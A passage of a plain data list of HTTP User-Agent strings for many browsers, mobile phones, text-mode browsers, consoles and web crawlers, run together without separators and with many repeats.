UP.Link/5.1.2.12 (Google 
WAP Proxy/1.0) BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0 BlackBerry8320/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/100 BlackBerry8330/4.3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/105 BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 BlackBerry9530/4.7.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 UP.Link/6.3.1.20.0 BlackBerry9700/5.0.0.351 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/123 Bloglines/3.1 (http://www.bloglines.com) CSSCheck/1.2.2 DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) DoCoMo/2.0 SH901iC(c100;TB;W24H12) Download Demon/3.5.0.11 ELinks (0.4.3; NetBSD 3.0.2PATCH sparc64; 141x19) ELinks (0.4pre5; Linux 2.6.10-ac7 i686; 80x33) ELinks/0.12~pre5-4 ELinks/0.9.3 (textmode; Linux 2.6.9-kanotix-8 i686; 127x41) EmailWolf 1.00 FAST-WebCrawler/3.8 (crawler at trd dot overture dot com; http://www.alltheweb.com/help/webmaster/crawler) FeedFetcher-Google; ( http://www.google.com/feedfetcher.html) Gaisbot/3.0 (robot@gais.cs.ccu.edu.tw; http://gais.cs.ccu.edu.tw/robot.php) Googlebot-Image/1.0 Googlebot-News Googlebot-Video/1.0 Googlebot/2.1 ( http://www.googlebot.com/bot.html) Gregarius/0.5.2 ( http://devlog.gregarius.net/docs/ua) Gulper Web Bot 0.2.4 (www.ecsl.cs.sunysb.edu/~maxim/cgi-bin/Link/GulperBot) HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0 HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 HTMLParser/1.6 Java/1.6.0_13 Jigsaw/2.2.5 W3C_CSS_Validator_JFouffa/2.0 Konqueror/3.0-rc4; (Konqueror/3.0-rc4; i686 Linux;;datecode) LG-GC900/V10a Obigo/WAP2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1 LG-LX550 AU-MIC-LX550/2.0 
MMP/2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 Links (2.1pre15; FreeBSD 5.3-RELEASE i386; 196x84) Links (2.1pre15; Linux 2.4.26 i686; 158x61) Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48) Links/0.9.1 (Linux 2.4.24; i386;) Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12 Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 MOT-V177/0.1.75 UP.Browser/6.2.3.9.c.12 (GUI) MMP/2.0 UP.Link/6.3.1.13.0 MOT-V9mm/00.62 UP.Browser/6.2.3.4.c.1.123 (GUI) MMP/2.0 MOTORIZR-Z8/46.00.00 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 356) Opera 8.65 [it] UP.Link/6.3.0.0.0 MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23 Mediapartners-Google Microsoft URL Control - 6.00.8862 Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2) Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2.1 Mozilla/2.0 (compatible; Ask Jeeves/Teoma) Mozilla/2.02E (Win95; U) Mozilla/3.0 (compatible; NetPositive/2.1.1; BeOS) Mozilla/3.01Gold (Win95; I) Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0 Mozilla/4.0 (PSP (PlayStation Portable); 2.00) Mozilla/4.0 (compatible; Dillo 3.0) Mozilla/4.0 (compatible; GoogleToolbar 4.0.1019.5266-big; Windows XP 5.1; MSIE 6.0.2900.2180) Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.0 (screen 600x800) Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; MDA Pro/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1) Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9500/4.51 Profile/MIDP-2.0 Configuration/CLDC-1.1) Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC) Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90) Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0 ) Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/hspr-H102; Blazer/4.0) 16;320x320 Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/hspr-H102; Blazer/4.0) 16;320x320 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft 
ZuneHD 4.3) Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Sprint:PPC6800 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Sprint:PPC6800 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) XV6800 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 8.12; MSIEMobile6.0) Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Mozilla/4.0 (compatible; MSIE 6.0; j2me) ReqwirelessWeb/3.5 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser; Avant Browser; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0) Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0) Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Maxthon 2.0) Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0) Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C) Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6 Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0) Mozilla/4.0 (compatible; MSIE 
8.0; Windows NT 6.1; Trident/4.0) Mozilla/4.1 (compatible; MSIE 5.0; Symbian OS; Nokia 6600;452) Opera 6.20 [en-US] Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30) Mozilla/4.8 [en] (Windows NT 5.1; U) Mozilla/4.8 [en] (X11; U; SunOS; 5.7 sun4u) Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0 Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1 Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 Mozilla/5.0 (BB10; Touch) AppleWebKit/537.10+ (KHTML, like Gecko) Version/10.1.0.2342 Mobile Safari/537.10+ Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20060702 SeaMonkey/1.5a Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1 (KHTML, Like Gecko) Version/6.0.0.141 Mobile Safari/534.1 Mozilla/5.0 (Linux U; en-US) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) Version/4.0 Kindle/3.0 (screen 600x800; rotate) Mozilla/5.0 (Linux; Android 4.1.2; SHV-E250S Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 4.4; Nexus 5 Build/BuildID) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 4.4; Nexus 5 Build/BuildID) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522 (KHTML, like Gecko) Safari/419.3 Mozilla/5.0 (Linux; U; Android 1.0; en-us; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 Mozilla/5.0 (Linux; U; Android 1.1; en-gb; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 Mozilla/5.0 (Linux; U; Android 1.5; de-ch; HTC Hero Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; 
U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 1.5; de-de; HTC Magic Build/PLAT-RC33) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 FirePHP/0.3 Mozilla/5.0 (Linux; U; Android 1.5; en-gb; T-Mobile_G2_Touch Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 1.5; en-us; SPH-M900 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 1.5; en-us; T-Mobile G1 Build/CRB43) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari 525.20.1 Mozilla/5.0 (Linux; U; Android 1.5; en-us; htc_bahamas Build/CRB17) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 1.5; en-us; sdk Build/CUPCAKE) AppleWebkit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 1.5; fr-fr; GT-I5700 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 1.6; en-us; HTC_TATTOO_A3288 Build/DRC79) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 1.6; en-us; SonyEricssonX10i Build/R1AA056) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 1.6; es-es; SonyEricssonX10i Build/R1FA016) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 2.0.1; de-de; Milestone Build/SHOLS_U2_01.14.0) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile 
Safari/530.17 Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 Mozilla/5.0 (Linux; U; Android 2.0; en-us; Milestone Build/ SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 Mozilla/5.0 (Linux; U; Android 2.1-update1; de-de; HTC Desire 1.19.161.5 Build/ERE27) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 Mozilla/5.0 (Linux; U; Android 2.1; en-us; HTC Legend Build/cupcake) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.2; en-us; ADR6300 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.2; en-us; ADR6300 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.2; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.2; en-us; SCH-I800 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.2; en-us; 
SCH-I800 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.3.3; en-us ; LS670 Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1/UCBrowser/8.6.1.262/145/355 Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; BNTV250 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Safari/533.1 Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; GT-P7100 Build/HRI83) AppleWebkit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; GT-P7100 Build/HRI83) AppleWebkit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) 
Version/4.0 Mobile Safari/534.30 Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; KFTT Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Silk/2.1 Mobile Safari/535.19 Silk-Accelerated=true Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; KFTT Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Silk/2.1 Mobile Safari/535.19 Silk-Accelerated=true Mozilla/5.0 (Linux; U; Android 4.1; en-us; sdk Build/MR1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.1 Safari/534.30 Mozilla/5.0 (Linux; U; Android 4.2; en-us; sdk Build/MR1) AppleWebKit/535.19 (KHTML, like Gecko) Version/4.2 Safari/535.19 Mozilla/5.0 (Linux; U; Android 4.3; en-us; sdk Build/MR1) AppleWebKit/536.23 (KHTML, like Gecko) Version/4.3 Mobile Safari/536.23 Mozilla/5.0 (Linux; webOS/2.2.4; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) webOSBrowser/221.56 Safari/534.6 Pre/3.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.5; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Camino/2.2.1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre Camino/2.2a1pre Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20100101 Firefox/5.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:20.0) Gecko/20100101 Firefox/20.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20120813 Firefox/16.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 
Firefox/21.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 1083) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML like Gecko) Version/6.0.2 Safari/536.26.17 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.79 Safari/537.4 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.31 (KHTML like Gecko) Chrome/26.0.1410.63 Safari/537.31 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.14) Gecko/20110218 AlexaToolbar/alxf-2.0 Firefox/3.6.14 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7;en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7;en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Mozilla/5.0 
(Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.2 Safari/532.8 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us; Silk/1.0.13.81_10003810) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 Silk-Accelerated=true Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/534.20.8 (KHTML, like Gecko) Version/5.1 Safari/534.20.8 Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0.112941 Mozilla/5.0 (Macintosh; U; Mac OS X Mach-O; en-US; rv:2.0a) Gecko/20040614 Firefox/3.0.0 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8 Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/85.8 Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3 Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.15 Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3 Mozilla/5.0 (Maemo; Linux armv7l; rv:10.0.1) 
Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1 Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13 Mozilla/5.0 (MeeGo; NokiaN950-00/00) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13 Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Arora/0.11.0 Safari/533.3 Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) QupZilla/1.3.1 Safari/533.3 Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20100101 Firefox/10.0.12 Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20130108 Firefox/10.0.12 SeaMonkey/2.7.2 Mozilla/5.0 (PLAYSTATION 3; 1.10) Mozilla/5.0 (PLAYSTATION 3; 2.00) Mozilla/5.0 (PlayBook; U; RIM Tablet OS 2.1.0; en-US) AppleWebKit/536.2+ (KHTML like Gecko) Version/7.2.1.0 Safari/536.2+ Mozilla/5.0 (PlayBook; U; RIM Tablet OS 2.1.0; en-US) AppleWebKit/536.2+ (KHTML like Gecko) Version/7.2.1.0 Safari/536.2+ Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC6-01/011.010; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.2 3gpp-gba Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC7-00/012.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE6-00/021.002; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.16 Mobile Safari/533.4 3gpp-gba Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE7-00/010.016; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 
